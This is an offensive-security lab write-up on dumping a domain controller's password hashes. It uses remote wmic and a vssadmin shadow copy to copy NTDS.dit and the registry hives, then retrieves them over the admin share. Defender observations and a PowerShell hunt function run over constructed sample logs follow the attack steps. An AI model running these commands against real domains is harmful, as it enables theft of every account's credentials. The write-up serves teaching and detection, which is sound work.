
# Dumping Domain Controller Hashes via wmic and Vssadmin Shadow Copy

This quick lab shows how to dump all user hashes from the DC remotely: a shadow copy of the C drive is created with vssadmin over WMI, NTDS.dit and the hives it needs are copied out of the snapshot (the live NTDS.dit is locked and cannot be copied directly), and the files are pulled back over the admin share.

This lab assumes the attacker has already gained administrative access to the domain controller.

## Execution

Create a shadow copy of the C drive of the Domain Controller:

{% code title="attacker\@victim" %}

```cmd
wmic /node:dc01 /user:administrator@offense /password:123456 process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
```

{% endcode %}

![](/files/-LfaP9JMv1K3AOzIQNBc)

Copy NTDS.dit and the SYSTEM and SECURITY hives out of the snapshot into C:\temp on DC01. SYSTEM is required (it holds the boot key that decrypts the hashes in NTDS.dit); SECURITY is optional and adds the LSA secrets. `HarddiskVolumeShadowCopy1` is the first snapshot on this lab DC; on a host that already has snapshots the number is higher, as `vssadmin list shadows` shows:

{% code title="attacker\@victim" %}

```cmd
wmic /node:dc01 /user:administrator@offense /password:123456 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\temp\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\temp\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY c:\temp\"
```

{% endcode %}

Below, the command is run from the attacking machine (right) and the files land in c:\temp on DC01 (left):

![](/files/-Lfa_NvNdi0W11EARqKP)

Map \\dc01\c$\temp to a local drive to retrieve the dumped files:

{% code title="attacker\@victim" %}

```powershell
net use j: \\dc01\c$\temp /user:administrator 123456; dir j:\
```

{% endcode %}

![](/files/-Lfa_lAev0lVzTL40dh-)

Now, off you go extracting hashes with secretsdump as shown here:

{% content-ref url="/pages/-LHwpaPZnf94MyLpTb2z" %}
[Dumping Domain Controller Hashes Locally and Remotely](/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration.md)
{% endcontent-ref %}

## Observations

A quick note for defenders on process ancestry: the command shells started through `wmic process call create` run as children of `WmiPrvSE.exe` (the WMI provider host) rather than of an interactive shell, which is an unusual parent for `cmd.exe` on a domain controller:

![](/files/-LfaPCUFMkVICWg5F4zc)

and of course the command lines, where `vssadmin create shadow` followed by copies from `\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy*` of `NTDS.dit`, `SYSTEM` and `SECURITY` stand out (command-line logging must be enabled, via Sysmon or 4688 with command-line auditing):

![](/files/-LfabW8Rhdez1VI3WLZt)

as well as service states (the Volume Shadow Copy service is set to Manual start by default and is started on demand when vssadmin runs):

![](/files/-Lfaavm-6B3pUsOpbfYF)

...and of course the lateral movement piece: the remote WMI call goes over DCOM/RPC and shows up as a network logon of the administrator account from the attacking machine:

![](/files/-LfahZYptQD0OS_inswZ)
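The four observations above folded into one hunt over constructed sample records, added here as an example and not part of the original page. The records mimic Sysmon Event ID 1 (process creation), System Event ID 7036 (service state change) and Security Event ID 4624 (logon) fields as a collector might normalise them; the field names and the events themselves are assumptions, and the benign FS01 records are there to show that a `vssadmin create shadow` on its own is a weak signal:

```powershell
# Added example, not from the original page: the defender observations above (process ancestry,
# command lines, service state, lateral movement) as one hunt function. Records below are
# constructed by hand; field names are assumptions about how a collector normalises
# Sysmon ID 1 / System ID 7036 / Security ID 4624, not a real log format.
$sample = @(
    [pscustomobject]@{ Id=4624; Time='2019-05-02T10:00:00'; Host='DC01'; Account='OFFENSE\administrator'; LogonType=3; IpAddress='10.0.0.5' }
    [pscustomobject]@{ Id=1; Time='2019-05-02T10:00:01'; Host='DC01'; User='OFFENSE\administrator'
                       ParentImage='C:\Windows\System32\wbem\WmiPrvSE.exe'; Image='C:\Windows\System32\cmd.exe'
                       CommandLine='cmd /c vssadmin create shadow /for=C: 2>&1' }
    [pscustomobject]@{ Id=1; Time='2019-05-02T10:00:01'; Host='DC01'; User='OFFENSE\administrator'
                       ParentImage='C:\Windows\System32\cmd.exe'; Image='C:\Windows\System32\vssadmin.exe'
                       CommandLine='vssadmin create shadow /for=C:' }
    [pscustomobject]@{ Id=7036; Time='2019-05-02T10:00:02'; Host='DC01'; Service='Volume Shadow Copy'; State='running' }
    [pscustomobject]@{ Id=1; Time='2019-05-02T10:00:40'; Host='DC01'; User='OFFENSE\administrator'
                       ParentImage='C:\Windows\System32\wbem\WmiPrvSE.exe'; Image='C:\Windows\System32\cmd.exe'
                       CommandLine='cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\temp\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\temp\' }
    # Benign look-alike: a backup job on a file server snapshots D: under the service host, not WMI.
    [pscustomobject]@{ Id=1; Time='2019-05-02T23:00:00'; Host='FS01'; User='NT AUTHORITY\SYSTEM'
                       ParentImage='C:\Windows\System32\svchost.exe'; Image='C:\Windows\System32\vssadmin.exe'
                       CommandLine='vssadmin create shadow /for=D:' }
    [pscustomobject]@{ Id=7036; Time='2019-05-02T23:00:01'; Host='FS01'; Service='Volume Shadow Copy'; State='running' }
)

function Find-ShadowCopyDump {
    param([Parameter(Mandatory)][object[]]$Events)
    $shells        = 'cmd.exe', 'powershell.exe', 'pwsh.exe'
    $results       = @()
    $wmiShellUsers = @{}   # "HOST|USER" -> $true for every WMI-spawned shell seen in pass one

    # Pass one: process-creation events.
    foreach ($e in $Events | Sort-Object Time) {
        if ($e.Id -ne 1) { continue }
        $image  = Split-Path $e.Image -Leaf
        $parent = Split-Path $e.ParentImage -Leaf
        $hits   = @()
        if ($parent -ieq 'WmiPrvSE.exe' -and $shells -contains $image) {
            $hits += 'shell spawned by the WMI provider host (remote wmic / Invoke-WmiMethod)'
            $wmiShellUsers["$($e.Host)|$($e.User)"] = $true
        }
        if ($image -ieq 'vssadmin.exe' -and $e.CommandLine -match 'create\s+shadow') {
            $hits += 'shadow copy created with vssadmin (weak on its own; backup agents do this too)'
        }
        if ($e.CommandLine -match 'HarddiskVolumeShadowCopy\d+\\Windows\\(NTDS\\NTDS\.dit|System32\\config\\(SYSTEM|SECURITY|SAM))\b') {
            $hits += 'credential store copied out of a shadow copy device path'
        }
        foreach ($h in $hits) {
            $results += [pscustomobject]@{ Time=$e.Time; Host=$e.Host; User=$e.User; Finding=$h; Evidence=$e.CommandLine }
        }
    }

    # Pass two: the service start and the network logon that carried the WMI call, reported only
    # for hosts/accounts that also produced a WMI-spawned shell, so a lone VSS start (FS01 above)
    # or an ordinary admin logon does not alert by itself.
    foreach ($e in $Events) {
        $hostHasWmiShell = ($wmiShellUsers.Keys | Where-Object { $_ -like "$($e.Host)|*" })
        if ($e.Id -eq 7036 -and $e.Service -eq 'Volume Shadow Copy' -and $e.State -eq 'running' -and $hostHasWmiShell) {
            $results += [pscustomobject]@{ Time=$e.Time; Host=$e.Host; User=''; Finding='Volume Shadow Copy service started (Manual start by default)'; Evidence="$($e.Service) -> $($e.State)" }
        }
        if ($e.Id -eq 4624 -and $e.LogonType -eq 3 -and $wmiShellUsers["$($e.Host)|$($e.Account)"]) {
            $results += [pscustomobject]@{ Time=$e.Time; Host=$e.Host; User=$e.Account; Finding='network logon that carried the WMI call (lateral movement source)'; Evidence="from $($e.IpAddress), logon type 3" }
        }
    }
    $results | Sort-Object Time
}

Find-ShadowCopyDump -Events $sample | Format-Table -AutoSize
```

Run against the sample, the DC01 chain produces five findings (the logon from 10.0.0.5, two WMI-spawned shells, the vssadmin snapshot, the VSS start and the copy out of the snapshot device path), while FS01 yields only the weak vssadmin hit. In a real pipeline the regex in the third rule is the one worth keeping as a high-severity alert on its own: there is no legitimate reason for a command line to read `NTDS.dit` or the `SYSTEM`/`SECURITY` hives out of a `HarddiskVolumeShadowCopy` device.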

## References

<https://twitter.com/netmux/status/1123936748000690178?s=12>

